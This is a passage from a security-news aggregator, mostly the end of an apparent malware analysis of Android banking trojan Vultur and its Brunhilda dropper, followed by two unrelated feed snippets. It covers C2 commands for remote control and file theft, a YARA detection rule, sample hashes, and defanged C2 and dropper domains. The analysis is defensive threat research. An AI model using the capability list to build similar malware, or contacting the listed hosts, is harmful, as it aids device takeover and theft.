SharedPreferences.5283d36d-e3aa-45ed-a6fb-2abacf43d29c (NEW)Sends a POST with the vnc.config C2 method and stores the malware config in SharedPreferences.09defc05-701a-4aa3-bdd2-e74684a61624 (NEW)Hides / disables the keyboard, obtains a wake lock, disables keyguard (lock screen security), mutes the audio, stops the “TransparentActivity” from payload #2, and displays a black view.fc7a0ee7-6604-495d-ba6c-f9c2b55de688 (NEW)Hides / disables the keyboard, obtains a wake lock, disables keyguard (lock screen security), mutes the audio, stops the “TransparentActivity” from payload #2, and displays a custom WebView with HTML code loaded from SharedPreference key “946b7e8e” (“tvmq” value from malware config).8eac269d-2e7e-4f0d-b9ab-6559d401308d (NEW)Hides / disables the keyboard, obtains a wake lock, disables keyguard (lock screen security), mutes the audio, stops the “TransparentActivity” from payload #2.e7289335-7b80-4d83-863a-5b881fd0543d (NEW)Enables the keyboard and unmutes audio. Then, sends the vnc.snapshot method with empty JSON data.544a9f82-c267-44f8-bff5-0726068f349d (NEW)Retrieves the C2 command, payload and UUID, and executes the command in a thread.a7bfcfaf-de77-4f88-8bc8-da634dfb1d5a (NEW)Creates a custom notification to be shown in the status bar.444c0a8a-6041-4264-959b-1a97d6a92b86 (NEW)Retrieves the list of apps to block and corresponding HTML code through the vnc.blocked.packages C2 method and stores them in the blocked_package_template SharedPreference key.a1f2e3c6-9cf8-4a7e-b1e0-2c5a342f92d6 (NEW)Executes a file manager related command. Commands are:

1. 91b4a535-1a78-4655-90d1-a3dcb0f6388a – Downloads a file
2. cf2f3a6e-31fc-4479-bb70-78ceeec0a9f8 – Uploads a file
3. 1ce26f13-fba4-48b6-be24-ddc683910da3 – Deletes a file
4. 952c83bd-5dfb-44f6-a034-167901990824 – Installs a file
5. 787e662d-cb6a-4e64-a76a-ccaf29b9d7ac – Finds files containing a specified pattern Detection Writing YARA rules to detect Android malware can be challenging, as APK files are ZIP archives. This means that extracting all of the information about the Android application would involve decompressing the ZIP, parsing the XML, and so on. Thus, most analysts build YARA rules for the DEX file. However, DEX files, such as Vultur payload #3, are less frequently submitted to VirusTotal as they are uncovered at a later stage in the infection chain. To maximise our sample pool, we decided to develop a YARA rule for the Brunhilda dropper. We discovered some unique hex patterns in the dropper APK, which allowed us to create the YARA rule below. rule brunhilda_dropper
{
meta:
author = "Fox-IT, part of NCC Group"
description = "Detects unique hex patterns observed in Brunhilda dropper samples."
target_entity = "file"
strings:
$zip_head = "PK"
$manifest = "AndroidManifest.xml"
$hex1 = {63 59 5c 28 4b 5f}
$hex2 = {32 4a 66 48 66 76 64 6f 49 36}
$hex3 = {63 59 5c 28 4b 5f}
$hex4 = {30 34 7b 24 24 4b}
$hex5 = {22 69 4f 5a 6f 3a}
condition:
$zip_head at 0 and $manifest and #manifest >= 2 and 2 of ($hex*)
} Wrap-up Vultur’s recent developments have shown a shift in focus towards maximising remote control over infected devices. With the capability to issue commands for scrolling, swipe gestures, clicks, volume control, blocking apps from running, and even incorporating file manager functionality, it is clear that the primary objective is to gain total control over compromised devices. Vultur has a strong correlation to Brunhilda, with its C2 communication and payload decryption having the same implementation in the latest variants. This indicates that both the dropper and Vultur are being developed by the same threat actors, as has also been uncovered in the past. Furthermore, masquerading malicious activity through the modification of legitimate applications, encryption of traffic, and the distribution of functions across multiple payloads decrypted from native code, shows that the actors put more effort into evading detection and complicating analysis. During our investigation of recently submitted Vultur samples, we observed the addition of new functionality occurring shortly after one another. This suggests ongoing and active development to enhance the malware’s capabilities. In light of these observations, we expect more functionality being added to Vultur in the near future. Indicators of Compromise Analysed samples Package nameFile hash (SHA-256)Descriptioncom.wsandroid.suiteedef007f1ca60fdf75a7d5c5ffe09f1fc3fb560153633ec18c5ddb46cc75ea21Brunhilda Droppercom.medical.balance89625cf2caed9028b41121c4589d9e35fa7981a2381aa293d4979b36cf5c8ff2Vultur payload #1com.medical.balance1fc81b03703d64339d1417a079720bf0480fece3d017c303d88d18c70c7aabc3Vultur payload #2com.medical.balance4fed4a42aadea8b3e937856318f9fbd056e2f46c19a6316df0660921dd5ba6c5Vultur payload #3com.wsandroid.suite001fd4af41df8883957c515703e9b6b08e36fde3fd1d127b283ee75a32d575fcBrunhilda Dropperse.accessibility.appfc8c69bddd40a24d6d28fbf0c0d43a1a57067b19e6c3cc07e2664ef4879c221bVultur payload #1se.accessibility.app7337a79d832a57531b20b09c2fc17b4257a6d4e93fcaeb961eb7c6a95b071a06Vultur payload #2se.accessibility.app7f1a344d8141e75c69a3c5cf61197f1d4b5038053fd777a68589ecdb29168e0cVultur payload #3com.wsandroid.suite26f9e19c2a82d2ed4d940c2ec535ff2aba8583ae3867502899a7790fe3628400Brunhilda Droppercom.exvpn.fastvpn2a97ed20f1ae2ea5ef2b162d61279b2f9b68eba7cf27920e2a82a115fd68e31fVultur payload #1com.exvpn.fastvpnc0f3cb3d837d39aa3abccada0b4ecdb840621a8539519c104b27e2a646d7d50dVultur payload #2com.wsandroid.suite92af567452ecd02e48a2ebc762a318ce526ab28e192e89407cac9df3c317e78dBrunhilda Dropperjk.powder.tendencefa6111216966a98561a2af9e4ac97db036bcd551635be5b230995faad40b7607Vultur payload #1jk.powder.tendencedc4f24f07d99e4e34d1f50de0535f88ea52cc62bfb520452bdd730b94d6d8c0eVultur payload #2jk.powder.tendence627529bb010b98511cfa1ad1aaa08760b158f4733e2bbccfd54050838c7b7fa3Vultur payload #3com.wsandroid.suitef5ce27a49eaf59292f11af07851383e7d721a4d60019f3aceb8ca914259056afBrunhilda Dropperse.talkback.app5d86c9afd1d33e4affa9ba61225aded26ecaeb01755eeb861bb4db9bbb39191cVultur payload #1se.talkback.app5724589c46f3e469dc9f048e1e2601b8d7d1bafcc54e3d9460bc0adeeada022dVultur payload #2se.talkback.app7f1a344d8141e75c69a3c5cf61197f1d4b5038053fd777a68589ecdb29168e0cVultur payload #3com.wsandroid.suitefd3b36455e58ba3531e8cce0326cce782723cc5d1cc0998b775e07e6c2622160Brunhilda Droppercom.adajio.storm819044d01e8726a47fc5970efc80ceddea0ac9bf7c1c5d08b293f0ae571369a9Vultur payload #1com.adajio.storm0f2f8adce0f1e1971cba5851e383846b68e5504679d916d7dad10133cc965851Vultur payload #2com.adajio.stormfb1e68ee3509993d0fe767b0372752d2fec8f5b0bf03d5c10a30b042a830ae1aVultur payload #3com.protectionguard.appd3dc4e22611ed20d700b6dd292ffddbc595c42453f18879f2ae4693a4d4d925aBrunhilda Dropper (old variant)com.appsmastersafeyf4d7e9ec4eda034c29b8d73d479084658858f56e67909c2ffedf9223d7ca9bd2Vultur (old variant)com.datasafeaccountsanddata.club7ca6989ccfb0ad0571aef7b263125410a5037976f41e17ee7c022097f827bd74Vultur (old variant)com.app.freeguarding.twofactorc646c8e6a632e23a9c2e60590f012c7b5cb40340194cb0a597161676961b4de0Vultur (old variant) Note: Vultur payloads #1 and #2 related to Brunhilda dropper 26f9e19c2a82d2ed4d940c2ec535ff2aba8583ae3867502899a7790fe3628400 are the same as Vultur payloads #2 and #3 in the latest variants. The dropper in this case only drops two payloads, where the latest versions deploy a total of three payloads. C2 servers
  • safetyfactor[.]online
  • cloudmiracle[.]store
  • flandria171[.]appspot[.]com (FCM)
  • newyan-1e09d[.]appspot[.]com (FCM)
Dropper distribution URLs
  • mcafee[.]960232[.]com
  • mcafee[.]353934[.]com
  • mcafee[.]908713[.]com
  • mcafee[.]784503[.]com
  • mcafee[.]053105[.]com
  • mcafee[.]092877[.]com
  • mcafee[.]582630[.]com
  • mcafee[.]581574[.]com
  • mcafee[.]582342[.]com
  • mcafee[.]593942[.]com
  • mcafee[.]930204[.]com
References
  1. https://resources.prodaft.com/brunhilda-daas-malware-report
  2. https://www.threatfabric.com/blogs/vultur-v-for-vnc
  3. https://www.threatfabric.com/blogs/the-attack-of-the-droppers
  4. https://www.wildlifecenter.org/vulture-facts
Categorías: Security Posts

Cybersecurity Concerns for Ancillary Strength Control Subsystems

BreakingPoint Labs Blog - Jue, 2023/10/19 - 19:08
Additive manufacturing (AM) engineers have been incredibly creative in developing ancillary systems that modify a printed parts mechanical properties.  These systems mostly focus on the issue of anisotropic properties of additively built components.  This blog post is a good reference if you are unfamiliar with isotropic vs anisotropic properties and how they impact 3d printing.  […] The post Cybersecurity Concerns for Ancillary Strength Control Subsystems appeared first on BreakPoint Labs - Blog.
Categorías: Security Posts

Update on Naked Security

Naked Security Sophos - Mar, 2023/09/26 - 12:00
To consolidate all of our security intelligence and news in one location, we have migrated Naked Security to the Sophos News platform.
Categorías: Security Posts
Distribuir contenido